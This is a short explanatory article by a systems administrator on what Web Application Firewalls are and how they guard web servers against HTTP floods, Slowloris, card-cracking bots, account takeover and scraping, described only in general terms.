A WAF – Web Application Firewall – is a device, either physical, or virtual, that is used to protect web servers (application servers) from attackers, while allowing desired user traffic to pass unfettered. WAFs have become increasingly sophisticated since they were originally conceived in the late 1990s. Starting out as merely illegal web page character filters, they have progressed to protect against distributed denial of service (DDoS), bot attacks, and agile defense against software vulnerabilities. They often provide load balancing and TLS offloading as compulsory capabilities.
WAFs, function like a firewall but unlike a traditional firewall – which protects at layers 3 & 4 blocking IPs and ports – WAFs monitor at the application layer (layer 7). By monitoring a different layer they can identify and stop the higher level DDoS attacks. The most common attacks are HTTP Floods, whether they be basic, randomized, cache-bypass, or the opposite of the volumetric attacks called the Slowloris attack. Flood attacks are pretty straight forward in how they deny resources. The Slowloris attack on the other hand, works by transferring data very slowly, causing the server to exhaust its connection pool. These types of attacks can sometimes be difficult to identify as they typically look very much like legitimate traffic.
Although DDoS attacks are conducted with bots, they are often used for other purposes and consume an estimated 40% of the total internet traffic. The most common other uses are: credit card cracking, account takeover, and content/price scraping. Credit card cracking is a technique where given stolen card numbers associated with names, bots attempt to guess the remaining pieces by setting up small purchases against multiple different vendor sites in parallel looking for the CCV, expiration date, and associated postal code. Account takeover is where the bot uses compromised username/password combinations on many other sites and is based on the theory that people will use the same username/password because it’s easier to remember. Last, is content scraping. Content is scraped from original information owners and republished without permission to disrupt search engine optimizations. Other information that’s scraped includes price scraping for monitoring, and contact scraping for spammers.
Additionally, WAFs provide an additional level of protection that is more agile with signature updates and protection profiles which are much quicker to deploy than fixing code when vulnerabilities like log4j arise. This gives the site developers time to update the software to remediate the risks.
In today’s world, with nation state actors bank rolling whole communities of hackers, every web server of consequence should be protected by a WAF.
By William (Chris) Vest, Sr. Systems Administrator
